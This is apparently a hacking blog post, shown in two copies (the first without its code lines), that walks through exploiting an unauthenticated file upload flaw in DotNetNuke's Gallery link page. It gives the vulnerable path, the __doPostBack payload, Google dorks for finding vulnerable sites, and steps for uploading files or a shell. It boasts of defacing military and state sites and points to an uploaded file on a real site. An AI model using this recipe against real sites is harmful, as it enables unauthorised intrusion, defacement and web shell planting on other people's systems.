This BUG Find by Iranian Researchers
DNN(DotNetNuke) Gallery All Version Remote File Upload without Authentication
Bug Found by Alireza Afzali From ISCN Team
Date of finding bug : 2008/05/5
Over 10 military website and 20 state of United State of america Defaced by this bug
Find DNN path then go to this file
Select : File ( A File On Your Site )
after Loading then Put this Code instead URL
now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell
Here is the way of hacking site by portal.....
Step 1 :
Step 2:- Now enter this
this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
with
this
Step 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package
Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....
Congrats You just hacked a site..
DNN(DotNetNuke) Gallery All Version Remote File Upload without Authentication
Bug Found by Alireza Afzali From ISCN Team
Date of finding bug : 2008/05/5
Over 10 military website and 20 state of United State of america Defaced by this bug
Find DNN path then go to this file
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxSelect : File ( A File On Your Site )
after Loading then Put this Code instead URL
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')now you see Browse
select root folder and your file will upload to
site/dnn path/Portals/0
Note:you can only upload *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp, *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell
Here is the way of hacking site by portal.....
Step 1 :
Code:
WwW.Google.CoMStep 2:- Now enter this
Code:
:inurl:/tabid/36/language/en-US/Default.aspxCode:
inurl:"portals/0/"this is a dork to find the Portal Vulnerable sites, use it wisely
Step 3:- U will find many sites, Select the site which you are comfortable with.
Step 4:- For example take this site.
Step 5:- Now replace
Code:
/Home/tabid/36/Language/en-US/Default.aspxwith
this
Code:
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxStep 6:- You will get a Link Gallary page.So far so good!
Step 7:- Dont do anything for now, FINAL stage APPROACHING.
Step 8:-Now replace the URL in the address bar with a Simple Script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')Step 9:-You will Find the Browse and Upload Option
Step 10:-Upload your package
Step 11:-Go to http://www.site.com/potals0/YOUR.PAGE....
Congrats You just hacked a site..
Code:
http://www.essegielle.it/portals/0/2.swf
0 comments:
Post a Comment